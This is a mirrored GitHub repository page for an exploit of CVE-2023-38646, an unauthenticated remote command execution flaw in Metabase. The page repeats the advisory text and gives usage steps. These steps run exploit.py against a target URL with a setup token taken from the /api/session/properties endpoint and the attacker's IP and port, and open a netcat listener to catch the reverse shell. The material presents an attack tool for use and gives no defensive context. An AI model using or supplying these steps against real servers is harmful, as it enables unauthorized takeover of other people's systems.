Giters

junnythemarksman / CVE-2023-38646

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-38646 (Metabase Pre-Auth RCE)

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

Example usage

Open two terminals.

Terminal 1:

python3 exploit.py -u http://vulnerablewebsite.com -t "537up-70k3n-fr0m-4p1-535510n" -i 10.10.10.10 -p 9001

where:
-u: the URL for the vulnerable website
-t: the setup token taken from http://vulnerablewebsite.com/api/session/properties
-i: host IP address (your IP address)
-p: host port for connection

Terminal 2:

nc -lvnp 9001

About

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

Languages

Language:Python 100.0%